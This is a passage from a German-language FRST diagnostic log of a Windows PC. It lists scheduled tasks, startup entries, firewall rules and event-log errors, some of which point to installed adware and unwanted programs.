2009-07-14 04:34 - 2009-06-10 23:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0D1A705F-BC57-4C56-9001-41F179ED8A24} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-09-19] (Piriform Ltd)
Task: {2C62D752-B42F-4EBB-9A9B-8F3648694368} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe [2015-08-13] (Adobe Systems Incorporated)
Task: {2D33A450-57FF-4A00-AE28-E87E56431EBE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {4E8F7D37-0852-4EDC-861C-E3D03ECBABA7} - System32\Tasks\Opera scheduled Autoupdate 1438940281 => C:\Program Files (x86)\Opera\launcher.exe [2015-09-11] (Opera Software)
Task: {69CAC2C9-9E20-47E3-9AAC-5005640B912E} - System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {6D06CB31-009E-45FA-A9FE-85EEEF758F7C} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {6D47D039-18B5-44B4-8059-2A192F7A2F7E} - System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {80ACD03E-D8E8-47EB-B041-F165F30E230D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {9200AA28-5EB6-4EAD-BF4E-CDF0410B5CF9} - System32\Tasks\{A3BB51D3-1E67-46C5-8ED5-8734DECD6918} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=5.3.0.111.261&LastError=404
Task: {A23C2641-27E1-4303-8187-0DBF0233649C} - System32\Tasks\JetBoost_AutoUpdate => C:\Program Files (x86)\BlueSprig\JetBoost\AutoUpdate.exe [2012-11-27] (BlueSprig)
Task: {B304FCBA-F8AD-455F-95F7-BBA64D8987AB} - System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {B4A8F9FA-04C0-40CF-95EB-AE47E2BB4073} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe
Task: {C1019F60-C40C-40F9-99E0-A20254841B65} - System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441} => pcalua.exe -a "C:\Users\Kenny G\Desktop\bewerbung\bitdefender_isecurity.exe" -d "C:\Users\Kenny G\Desktop\bewerbung"
Task: {C4EDDEAE-BCF6-49B9-A64D-CACA20F51E9E} - System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {C7A41BF4-00C0-4FC0-A9C1-22B5B9F7ACC5} - System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{0FBD9ABF-7DA0-463E-A7DC-A394052CC9A8}\Setup.exe" -c -runfromtemp -l0x0407 -removeonly
Task: {CB8F7966-49EF-42D7-B59C-81E070B86191} - System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {EFCA144A-E45A-4877-8FAD-E51248235D56} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-06-02 09:01 - 2015-08-26 11:33 - 01205136 _____ () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
2013-11-03 19:09 - 2013-10-23 10:20 - 00102176 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-01-15 20:58 - 2014-01-15 21:16 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2015-09-19 11:34 - 2015-09-19 11:34 - 01610240 _____ () C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs
2013-09-13 19:51 - 2013-09-13 19:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2013-09-13 19:51 - 2013-09-13 19:51 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_12.1_Multilingual.exe:BDU
AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_13.1.2_x64_Multilingual.exe:BDU
AlternateDataStreams: C:\Users\eLoot\Downloads\torbrowser-install-3.5.2_de.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\HiJackThis204.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\jetboost-setup-2.0.0.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupCasino_aad73b_de.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupPoker_5fabb7.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\TitanBSetup_5c0cd5.exe:BDU
AlternateDataStreams: C:\Users\Tabea Studium\Downloads\Shockwave_Installer_Slim.exe:BDU

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\webcompanion.com -> hxxp://webcompanion.com


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MyPC Backup.lnk => C:\Windows\pss\MyPC Backup.lnk.Startup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: Bdagent => "C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe"
MSCONFIG\startupreg: Bitdefender-Geldb�rse => 
MSCONFIG\startupreg: Bitdefender-Geldb�rse-Anwendungs-Agent => 
MSCONFIG\startupreg: CyberGhost => "C:\Program Files\CyberGhost 5\CyberGhost.exe" /autostart /min
MSCONFIG\startupreg: FreeAC => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe -autorun
MSCONFIG\startupreg: GoogleChromeAutoLaunch_9CD6D292798361639A68D2D1D9501714 => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
MSCONFIG\startupreg: icq => C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe -CU
MSCONFIG\startupreg: InstallerLauncher => "C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\setuplauncher.exe" /run:"C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\Installer.exe"
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: mobilegeni daemon => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe
MSCONFIG\startupreg: Optimizer Pro => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe
MSCONFIG\startupreg: Sony PC Companion => "C:\Program Files (x86)\Sony\Sony PC Companion\PCCompanion.exe" /Background
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: vProt => "C:\Program Files (x86)\AVG Web TuneUp\vprot.exe"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{F1E8D03D-FFA2-42DD-A766-22ABE0AD0436}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{A0A07BA7-2135-482B-8CF0-7D59DA237E7B}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{15629829-3DD3-4A81-B20D-4255F55023B9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{51D8DA04-F385-4088-8779-22A2C6969D59}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{1CD2F4D1-8114-4FBA-9D7E-4BFC8959B015}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{1B40452A-2002-47A8-B02E-49C07A677A04}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{B6489A7B-4235-4D96-99A9-EEDD6A2FE8BD}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{720D02FF-52F6-4154-A621-5AB2A3DB03A3}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{C7AF308F-8BD1-41D4-A681-37A1C88C993A}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{10736636-FB53-42C9-A3F4-529BAFEF521E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{750C88E5-8449-4ED6-87F6-6F9A40C73F22}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{72A3B8D8-259B-478D-8EA1-E3F979D8CA18}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{81B1EC25-555A-4F2F-9395-9FD97F51323B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{2C423E45-FD79-468B-B116-1FC2C2477842}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{DA81D9C0-E7D2-4027-B0A5-A8A45C00F77D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{521249EF-E21D-4C4E-8C32-FDD3F208B733}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{89E0E88B-D4E4-491D-A414-02FCD1F3D197}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{1C8A9419-FD22-4DAA-A57C-F115A281A979}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe
FirewallRules: [{8B608DD6-21BB-4A2E-8800-E7106712C6F0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe
FirewallRules: [{A1CF8413-A121-4594-8D4F-822D997AD1F7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe
FirewallRules: [{78D1B940-9035-4A6C-BF79-C39436D455B2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe
FirewallRules: [{9FD597A8-5DF3-405B-BF40-DAD0B4A3D331}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm
FirewallRules: [{33EBB500-8307-46EF-8E6E-4044649E5550}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm
FirewallRules: [{B2E37F34-F81A-4758-AE8C-6350303ED76A}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe
FirewallRules: [{F8A57BC5-5370-4537-AD73-18A47D9490BA}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe
FirewallRules: [{396CE83B-463E-4ABD-9DDF-3AAF00CF8FC2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe
FirewallRules: [{55CF9D3A-CEA1-4EE1-9710-588133F87671}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe
FirewallRules: [{257241F5-DB72-4BCC-966A-EB960C45A132}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe
FirewallRules: [{B075E0A7-AA0A-476A-8E74-51E6DE493C7A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe
FirewallRules: [{FECE91C7-34A5-4011-ACE9-0C45BCC3E776}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4F4A4AF0-A162-4CDE-A55E-56F506AF9332}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{E2340314-D830-445B-ACFE-84B2490E2D2B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{6E566919-5331-43A5-85E4-7B72D59CEE97}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{C86938D2-4623-4413-8927-C89AAE8215B2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CAB95473-AE42-4A88-A6CD-2019753F6D1F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8A3B2F36-312E-4CF7-A10A-E8D05CB2FD24}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe
FirewallRules: [{707E083B-17A4-43B5-A25F-F911B7A2478B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe
FirewallRules: [{D466720C-AE72-408E-81DB-EF107F94C734}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
FirewallRules: [{875B4892-FDD1-4915-BE18-3D04DCB57C60}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
FirewallRules: [{2BCB0DB0-2EB2-4F78-8EEE-6E29EE0C7CFD}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe
FirewallRules: [{FCF89AD8-A839-4426-A4C5-771A89F905E3}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe
FirewallRules: [{9B5F71A5-ACE5-483E-8E24-4F704CB2BD56}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
FirewallRules: [{165D76C1-CFCF-4A31-95F2-57AD4831602B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
FirewallRules: [TCP Query User{11D72B15-04AE-4224-98D0-4E863D33585C}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{1E3DB40B-BE9E-42A4-8A07-6F1460C15F3A}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{99D93149-D86B-4104-94D4-75AB15AAEBB6}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin
FirewallRules: [UDP Query User{32F3CAD3-4F49-4157-A353-BC565EEB431F}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin
FirewallRules: [{1AFD0420-A3E2-4D4C-89BF-9175F1E06A0C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{48969429-133A-4C3A-96AA-517EE6CD1645}] => (Allow) C:\Program Files (x86)\Max Driver Updater\maxdu.exe
FirewallRules: [{FBEF1CE7-BE0B-4061-BD5F-A3965CC65AD6}] => (Allow) D:\Verkauf\powerpoint\Office15\outlook.exe

==================== Fehlerhafte Geräte im Gerätemanager =============

Konnte Geräte nicht auflisten. Überprüfen Sie den "winmgmt" Dienst oder reparieren Sie den WMI.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (09/20/2015 12:59:42 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Resources32,processorArchitecture="x86",type="win32",version="2.7.4.0"1".
Die abhängige Assemblierung "Resources32,processorArchitecture="x86",type="win32",version="2.7.4.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (09/19/2015 10:46:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: Lavasoft.SearchProtect.WinService.exe, Version: 1.0.0.0, Zeitstempel: 0x5575d81f
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bdfe0
Ausnahmecode: 0xe0434f4d
Fehleroffset: 0x000000000000aa7d
ID des fehlerhaften Prozesses: 0x1a14
Startzeit der fehlerhaften Anwendung: 0xLavasoft.SearchProtect.WinService.exe0
Pfad der fehlerhaften Anwendung: Lavasoft.SearchProtect.WinService.exe1
Pfad des fehlerhaften Moduls: Lavasoft.SearchProtect.WinService.exe2
Berichtskennung: Lavasoft.SearchProtect.WinService.exe3

Error: (09/19/2015 04:07:14 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT-AUTORITÄT)
Description: Fehler beim Beenden einer Windows Installer-Transaktion: PROPLUS. Fehler 1603 beim Beenden der Transaktion.

Error: (09/19/2015 03:43:00 PM) (Source: MsiInstaller) (EventID: 11713) (User: KennyG-PC)
Description: Product: Microsoft PowerPoint MUI (English) 2013 -- Error 1713. Setup cannot install one of the required products for Microsoft PowerPoint MUI (English) 2013.

Error: (09/19/2015 03:37:40 PM) (Source: ESENT) (EventID: 215) (User: )
Description: WinMail (5048) WindowsMail0: Die Sicherung wurde abgebrochen, weil sie vom Client angehalten wurde, oder weil die Verbindung mit dem Client unterbrochen wurde.

Error: (09/19/2015 12:44:19 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT-AUTORITÄT)
Description: Fehler beim Beenden einer Windows Installer-Transaktion: PROPLUS. Fehler 1603 beim Beenden der Transaktion.

Error: (09/19/2015 12:33:11 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT-AUTORITÄT)
Description: Fehler beim Beenden einer Windows Installer-Transaktion: PROPLUS. Fehler 1603 beim Beenden der Transaktion.

Error: (09/19/2015 12:15:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: dnsridgewood.exe, Version: 1.0.0.0, Zeitstempel: 0x55c751a5
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bdfe0
Ausnahmecode: 0xe0434352
Fehleroffset: 0x000000000000aa7d
ID des fehlerhaften Prozesses: 0x1bf0
Startzeit der fehlerhaften Anwendung: 0xdnsridgewood.exe0
Pfad der fehlerhaften Anwendung: dnsridgewood.exe1
Pfad des fehlerhaften Moduls: dnsridgewood.exe2
Berichtskennung: dnsridgewood.exe3

Error: (09/19/2015 12:15:49 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Anwendung: dnsridgewood.exe
Frameworkversion: v4.0.30319
Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet.
Ausnahmeinformationen: System.Runtime.InteropServices.COMException
Stapel:
   bei System.Management.ManagementScope.Initialize()
   bei System.Management.ManagementObject.Initialize(Boolean)
   bei System.Management.ManagementClass.GetInstances(System.Management.EnumerationOptions)
   bei GreenTeamDNS.TcpIPWMI.setDNS(System.String, System.String)
   bei GreenTeamDNS.App.setProtectionLevel(Int32, Boolean)
   bei GreenTeamDNS.App.OnStartup(System.Windows.StartupEventArgs)
   bei System.Windows.Application.<.ctor>b__1(System.Object)
   bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32)
   bei MS.Internal.Threading.ExceptionFilterHelper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate)
   bei System.Windows.Threading.Dispatcher.WrappedInvoke(System.Delegate, System.Object, Int32, System.Delegate)
   bei System.Windows.Threading.DispatcherOperation.InvokeImpl()
   bei System.Threading.ExecutionContext.runTryCode(System.Object)
   bei System.Runtime.CompilerServices.RuntimeHelpers.ExecuteCodeWithGuaranteedCleanup(TryCode, CleanupCode, System.Object)
   bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   bei System.Windows.Threading.DispatcherOperation.Invoke()
   bei System.Windows.Threading.Dispatcher.ProcessQueue()
   bei System.Windows.Threading.Dispatcher.WndProcHook(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef)
   bei MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef)
   bei MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object)
   bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32)
   bei MS.Internal.Threading.ExceptionFilterHelper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate)
   bei System.Windows.Threading.Dispatcher.WrappedInvoke(System.Delegate, System.Object, Int32, System.Delegate)
   bei System.Windows.Threading.Dispatcher.InvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32)
   bei MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr)
   bei MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef)
   bei System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame)
   bei System.Windows.Application.RunInternal(System.Windows.Window)
   bei System.Windows.Application.Run()
   bei GreenTeamDNS.App.Main()

Error: (09/18/2015 09:59:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9765


Systemfehler:
=============
Error: (09/20/2015 07:30:31 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "AVGIDSAgent" wurde mit folgendem dienstspezifischem Fehler beendet: %%-536753635.

Error: (09/20/2015 06:25:40 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: Der Dienst "Sicherheitscenter" ist von folgendem Dienst abhängig: Winmgmt. Dieser Dienst ist eventuell nicht installiert.

Error: (09/20/2015 06:23:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "IE Search Set" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (09/20/2015 06:23:17 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "LavasoftTcpService" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (09/20/2015 06:23:17 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: Der Dienst "IP-Hilfsdienst" ist von folgendem Dienst abhängig: Winmgmt. Dieser Dienst ist eventuell nicht installiert.

Error: (09/20/2015 06:23:17 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: Der Dienst "CyberGhost 5 Client Service" ist von folgendem Dienst abhängig: Winmgmt. Dieser Dienst ist eventuell nicht installiert.

Error: (09/20/2015 06:21:44 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler: 
%%1056

Error: (09/20/2015 06:21:13 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Presentation Foundation-Schriftartcache 3.0.0.0" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 0 Millisekunden durchgeführt: Neustart des Diensts.

Error: (09/20/2015 06:21:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Disc Soft Lite Bus Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (09/20/2015 06:21:12 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Search" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.


CodeIntegrity:
===================================
  Date: 2015-09-09 00:48:00.156
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:48:00.111
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:48:00.054
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:48:00.010
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:47:59.933
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:47:59.879
